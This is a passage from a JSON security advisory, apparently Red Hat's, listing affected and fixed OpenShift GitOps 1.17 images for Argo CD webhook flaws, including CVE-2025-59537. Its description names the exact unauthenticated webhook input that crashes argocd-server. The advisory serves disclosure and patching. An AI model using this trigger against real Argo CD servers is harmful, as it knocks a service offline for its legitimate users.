"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:1eb401fa44278a8558d45167b3d2507fac77521a2fb322bb66012d4cdfec87b6_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:5109b457be26c5d03311c5fa52f43d4db7606ecae58360a479fa8562d808fadc_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:b6c7ce8543542a2943498c7cc5f3be103493d7c8a3055dfbfe4b468285542cc7_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:faa950d8512bc45382646c6c7d403ebf91fcd47d8ca65f4124fed91e77bebf2e_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:12e0ab863663d47e2a483839e000eb8fa624bd5766bf706213db295a0e00815f_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:4b3765fa97fcf85c39a17e88712fdd1bfa158a8677f714e862d35cadedeeda62_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:99403da3c050737dbda083bb11d413b317fa2cb7143ee4ce0125fb6ad44ca184_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:a2339147b13271b43dfd58901f09ed024a5f8d1ad1def8639c416710d68f1ca3_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:54f6d32f5aa8ad998eb98ef2035b7593704cca8db98251ff77405801920e324b_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:9ef69c345cfa9198e4d56366946741f83413e0cc1e63a95104a5dd476805e78d_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:b9125f40d94e6aa05df7814a23d47e904ccee9f5204ebcfd994f9432b3feb0fb_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:c7b52016e71fc0b1118e0253840f261c0d21a64a9135b5f7971cb6dab3dcc285_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:8fd8642fc3d8133141119dd425bc78bb57be51360cb3c28cc1b54968e79b6b55_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:a4b698bd79e935b61cfc559ac512fd1e634d6f347a6afe335161de3325a164ab_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:a85ac1be1b1879662d4cec1033d6916f4c142221282aff09113383ba236a2bdb_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:af6d72cac08a08cc48d446e426fe1e34e21d71a7779dafdbea08173be063149f_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:439fef0be72eb98010e262668a420425c4b74924c3a929dcbac987de1341d8e6_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:47c66c140471b49a4e95bc25788d261e8951eeec2a55ea5d07b8a3670a393ef6_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:64d8c57090f88ebd3671a390e1b1956f799cda24c85e978d8f937f302ceb40f5_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:ba88e66dc3f39019be91230d122ee73e0b0b931a6d3c7d7130f2a7dbb0d4c553_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-operator-bundle@sha256:4fc82c51692138acd9a7232fc4b3451cbca9f7be763452c811bea7a68867cb93_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:5cdb2206120407d94f409ebb2639c5b61679df14be99d60db25703ab9f9b3ef4_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:689a9a102c8087e3adf3646dc686647cb6197df3524cab1db6ba94e618c55282_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:a85eb07d72178b495f77ed1566f3ec72969fdc8acf83b2e847e7c393739ee459_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:cbbc245f3f5be44aff1e09b209c814bb7128b53d2530b17c02c4b810fe682787_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:0c32ee1204ce384bf91892ddc887e9eff7059242f387c614ca6049c9c0392c4e_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:1cd978e7d7fbf499996c6f2da908ee77a07f5fe229b4424b7f48ee94f142e4ab_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:ac34135ee63849e8620c33cfdd619f810d87d07d2ba9ca35c0932bdbf1e1d6cc_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:d3f6398dc0b730251e2cac7826c14cca18324ce6854d7844aad43ebc22a1c7ec_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:2bfd51f1bee622faddee3acd58f372c0b3b4db406ffabeae84677b091e364a53_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:36ce4a97fb4a83ee3aec72957c2bb028f35e5adc3c936c2786970ff7562c0783_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:87add4524478a000579bc7caa048946e2bf2ca65886da0dd032c4be455d78fc8_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:c9ec61f94b616f0dff0c0aa0de9d719449a6d24e77b4ac2af760098af5328523_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "argocd: argocd-server: gitops: Unauthenticated argocd-server panic via a malicious Bitbucket-Server webhook payload"
},
{
"cve": "CVE-2025-59537",
"cwe": {
"id": "CWE-476",
"name": "NULL Pointer Dereference"
},
"discovery_date": "2025-10-01T22:00:51.264122+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:a03e72ceb733c34a4788d294d14f0e4ee0e03e2b509a4f7e78f4abebe4d8224a_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:a0686e82d2d203e6af794691ba50101aa9a1fb049523cc50aa0a870bdcae4113_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:c28cabf7a7e417448c23bed8741d86cec7a60b70598672a8766279ea67a7d570_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:e5c9119e2417f4085ad78a71653ec1653096923672d03b4d8a384334dca20a90_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:1dd0c50f25497541f3b4e35b802ed9110987870d38960bda7d530436f7875e73_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:1f35c7ec22e6cb4c4d1e5da664a4b4fdd6e4b9fe98c93e9f5f6e9b16dcc12ff5_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:a182f8ec61c4dc5f32a87750e28b792d0ff3b666ae9d67a39ac9dc6e2bc84e5e_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:a73d1a81029d39de7900b5c52f22bcb57188d973391c4a2f81bbde612b9185fb_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:1eb401fa44278a8558d45167b3d2507fac77521a2fb322bb66012d4cdfec87b6_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:5109b457be26c5d03311c5fa52f43d4db7606ecae58360a479fa8562d808fadc_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:b6c7ce8543542a2943498c7cc5f3be103493d7c8a3055dfbfe4b468285542cc7_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:faa950d8512bc45382646c6c7d403ebf91fcd47d8ca65f4124fed91e77bebf2e_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:8fd8642fc3d8133141119dd425bc78bb57be51360cb3c28cc1b54968e79b6b55_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:a4b698bd79e935b61cfc559ac512fd1e634d6f347a6afe335161de3325a164ab_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:a85ac1be1b1879662d4cec1033d6916f4c142221282aff09113383ba236a2bdb_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:af6d72cac08a08cc48d446e426fe1e34e21d71a7779dafdbea08173be063149f_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:439fef0be72eb98010e262668a420425c4b74924c3a929dcbac987de1341d8e6_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:47c66c140471b49a4e95bc25788d261e8951eeec2a55ea5d07b8a3670a393ef6_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:64d8c57090f88ebd3671a390e1b1956f799cda24c85e978d8f937f302ceb40f5_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:ba88e66dc3f39019be91230d122ee73e0b0b931a6d3c7d7130f2a7dbb0d4c553_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:0c32ee1204ce384bf91892ddc887e9eff7059242f387c614ca6049c9c0392c4e_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:1cd978e7d7fbf499996c6f2da908ee77a07f5fe229b4424b7f48ee94f142e4ab_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:ac34135ee63849e8620c33cfdd619f810d87d07d2ba9ca35c0932bdbf1e1d6cc_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:d3f6398dc0b730251e2cac7826c14cca18324ce6854d7844aad43ebc22a1c7ec_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:2bfd51f1bee622faddee3acd58f372c0b3b4db406ffabeae84677b091e364a53_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:36ce4a97fb4a83ee3aec72957c2bb028f35e5adc3c936c2786970ff7562c0783_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:87add4524478a000579bc7caa048946e2bf2ca65886da0dd032c4be455d78fc8_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:c9ec61f94b616f0dff0c0aa0de9d719449a6d24e77b4ac2af760098af5328523_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2400938"
}
],
"notes": [
{
"category": "description",
"text": "Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes. Versions 1.2.0 through 1.8.7, 2.0.0-rc1 through 2.14.19, 3.0.0-rc1 through 3.2.0-rc1, 3.1.7 and 3.0.18 are vulnerable to malicious API requests which can crash the API server and cause denial of service to legitimate clients. With the default configuration, no webhook.gogs.secret set, Argo CD\u2019s /api/webhook endpoint will crash the entire argocd-server process when it receives a Gogs push event whose JSON field commits[].repo is not set or is null. This issue is fixed in versions 2.14.20, 3.2.0-rc2, 3.1.8 and 3.0.19.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "github.com/argoproj/argo-cd: Argo CD unauthenticated Denial of Service",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "The availability risk of this vulnerability is limited to the Argo-CD application. General host availability is not at risk.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:12e0ab863663d47e2a483839e000eb8fa624bd5766bf706213db295a0e00815f_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:4b3765fa97fcf85c39a17e88712fdd1bfa158a8677f714e862d35cadedeeda62_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:99403da3c050737dbda083bb11d413b317fa2cb7143ee4ce0125fb6ad44ca184_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:a2339147b13271b43dfd58901f09ed024a5f8d1ad1def8639c416710d68f1ca3_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:54f6d32f5aa8ad998eb98ef2035b7593704cca8db98251ff77405801920e324b_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:9ef69c345cfa9198e4d56366946741f83413e0cc1e63a95104a5dd476805e78d_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:b9125f40d94e6aa05df7814a23d47e904ccee9f5204ebcfd994f9432b3feb0fb_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:c7b52016e71fc0b1118e0253840f261c0d21a64a9135b5f7971cb6dab3dcc285_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-operator-bundle@sha256:4fc82c51692138acd9a7232fc4b3451cbca9f7be763452c811bea7a68867cb93_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:5cdb2206120407d94f409ebb2639c5b61679df14be99d60db25703ab9f9b3ef4_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:689a9a102c8087e3adf3646dc686647cb6197df3524cab1db6ba94e618c55282_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:a85eb07d72178b495f77ed1566f3ec72969fdc8acf83b2e847e7c393739ee459_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:cbbc245f3f5be44aff1e09b209c814bb7128b53d2530b17c02c4b810fe682787_amd64"
],
"known_not_affected": [
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:a03e72ceb733c34a4788d294d14f0e4ee0e03e2b509a4f7e78f4abebe4d8224a_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:a0686e82d2d203e6af794691ba50101aa9a1fb049523cc50aa0a870bdcae4113_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:c28cabf7a7e417448c23bed8741d86cec7a60b70598672a8766279ea67a7d570_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:e5c9119e2417f4085ad78a71653ec1653096923672d03b4d8a384334dca20a90_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:1dd0c50f25497541f3b4e35b802ed9110987870d38960bda7d530436f7875e73_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:1f35c7ec22e6cb4c4d1e5da664a4b4fdd6e4b9fe98c93e9f5f6e9b16dcc12ff5_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:a182f8ec61c4dc5f32a87750e28b792d0ff3b666ae9d67a39ac9dc6e2bc84e5e_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:a73d1a81029d39de7900b5c52f22bcb57188d973391c4a2f81bbde612b9185fb_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:1eb401fa44278a8558d45167b3d2507fac77521a2fb322bb66012d4cdfec87b6_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:5109b457be26c5d03311c5fa52f43d4db7606ecae58360a479fa8562d808fadc_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:b6c7ce8543542a2943498c7cc5f3be103493d7c8a3055dfbfe4b468285542cc7_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:faa950d8512bc45382646c6c7d403ebf91fcd47d8ca65f4124fed91e77bebf2e_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:8fd8642fc3d8133141119dd425bc78bb57be51360cb3c28cc1b54968e79b6b55_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:a4b698bd79e935b61cfc559ac512fd1e634d6f347a6afe335161de3325a164ab_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:a85ac1be1b1879662d4cec1033d6916f4c142221282aff09113383ba236a2bdb_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:af6d72cac08a08cc48d446e426fe1e34e21d71a7779dafdbea08173be063149f_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:439fef0be72eb98010e262668a420425c4b74924c3a929dcbac987de1341d8e6_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:47c66c140471b49a4e95bc25788d261e8951eeec2a55ea5d07b8a3670a393ef6_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:64d8c57090f88ebd3671a390e1b1956f799cda24c85e978d8f937f302ceb40f5_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:ba88e66dc3f39019be91230d122ee73e0b0b931a6d3c7d7130f2a7dbb0d4c553_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:0c32ee1204ce384bf91892ddc887e9eff7059242f387c614ca6049c9c0392c4e_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:1cd978e7d7fbf499996c6f2da908ee77a07f5fe229b4424b7f48ee94f142e4ab_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:ac34135ee63849e8620c33cfdd619f810d87d07d2ba9ca35c0932bdbf1e1d6cc_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:d3f6398dc0b730251e2cac7826c14cca18324ce6854d7844aad43ebc22a1c7ec_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:2bfd51f1bee622faddee3acd58f372c0b3b4db406ffabeae84677b091e364a53_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:36ce4a97fb4a83ee3aec72957c2bb028f35e5adc3c936c2786970ff7562c0783_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:87add4524478a000579bc7caa048946e2bf2ca65886da0dd032c4be455d78fc8_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:c9ec61f94b616f0dff0c0aa0de9d719449a6d24e77b4ac2af760098af5328523_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-59537"
},
{
"category": "external",
"summary": "RHBZ#2400938",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2400938"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-59537",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-59537"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-59537",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-59537"
},
{
"category": "external",
"summary": "https://github.com/argoproj/argo-cd/commit/761fc27068d2d4cd24e1f784eb2a9033b5ee7f43",
"url": "https://github.com/argoproj/argo-cd/commit/761fc27068d2d4cd24e1f784eb2a9033b5ee7f43"
},
{
"category": "external",
"summary": "https://github.com/argoproj/argo-cd/security/advisories/GHSA-wp4p-9pxh-cgx2",
"url": "https://github.com/argoproj/argo-cd/security/advisories/GHSA-wp4p-9pxh-cgx2"
}
],
"release_date": "2025-10-01T21:01:36.519000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-10-09T18:48:05+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:12e0ab863663d47e2a483839e000eb8fa624bd5766bf706213db295a0e00815f_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:4b3765fa97fcf85c39a17e88712fdd1bfa158a8677f714e862d35cadedeeda62_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:99403da3c050737dbda083bb11d413b317fa2cb7143ee4ce0125fb6ad44ca184_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:a2339147b13271b43dfd58901f09ed024a5f8d1ad1def8639c416710d68f1ca3_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:54f6d32f5aa8ad998eb98ef2035b7593704cca8db98251ff77405801920e324b_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:9ef69c345cfa9198e4d56366946741f83413e0cc1e63a95104a5dd476805e78d_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:b9125f40d94e6aa05df7814a23d47e904ccee9f5204ebcfd994f9432b3feb0fb_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:c7b52016e71fc0b1118e0253840f261c0d21a64a9135b5f7971cb6dab3dcc285_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-operator-bundle@sha256:4fc82c51692138acd9a7232fc4b3451cbca9f7be763452c811bea7a68867cb93_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:5cdb2206120407d94f409ebb2639c5b61679df14be99d60db25703ab9f9b3ef4_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:689a9a102c8087e3adf3646dc686647cb6197df3524cab1db6ba94e618c55282_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:a85eb07d72178b495f77ed1566f3ec72969fdc8acf83b2e847e7c393739ee459_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:cbbc245f3f5be44aff1e09b209c814bb7128b53d2530b17c02c4b810fe682787_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:17731"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:a03e72ceb733c34a4788d294d14f0e4ee0e03e2b509a4f7e78f4abebe4d8224a_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:a0686e82d2d203e6af794691ba50101aa9a1fb049523cc50aa0a870bdcae4113_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:c28cabf7a7e417448c23bed8741d86cec7a60b70598672a8766279ea67a7d570_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:e5c9119e2417f4085ad78a71653ec1653096923672d03b4d8a384334dca20a90_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:1dd0c50f25497541f3b4e35b802ed9110987870d38960bda7d530436f7875e73_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:1f35c7ec22e6cb4c4d1e5da664a4b4fdd6e4b9fe98c93e9f5f6e9b16dcc12ff5_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:a182f8ec61c4dc5f32a87750e28b792d0ff3b666ae9d67a39ac9dc6e2bc84e5e_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:a73d1a81029d39de7900b5c52f22bcb57188d973391c4a2f81bbde612b9185fb_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:1eb401fa44278a8558d45167b3d2507fac77521a2fb322bb66012d4cdfec87b6_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:5109b457be26c5d03311c5fa52f43d4db7606ecae58360a479fa8562d808fadc_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:b6c7ce8543542a2943498c7cc5f3be103493d7c8a3055dfbfe4b468285542cc7_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:faa950d8512bc45382646c6c7d403ebf91fcd47d8ca65f4124fed91e77bebf2e_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:12e0ab863663d47e2a483839e000eb8fa624bd5766bf706213db295a0e00815f_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:4b3765fa97fcf85c39a17e88712fdd1bfa158a8677f714e862d35cadedeeda62_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:99403da3c050737dbda083bb11d413b317fa2cb7143ee4ce0125fb6ad44ca184_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:a2339147b13271b43dfd58901f09ed024a5f8d1ad1def8639c416710d68f1ca3_amd64",
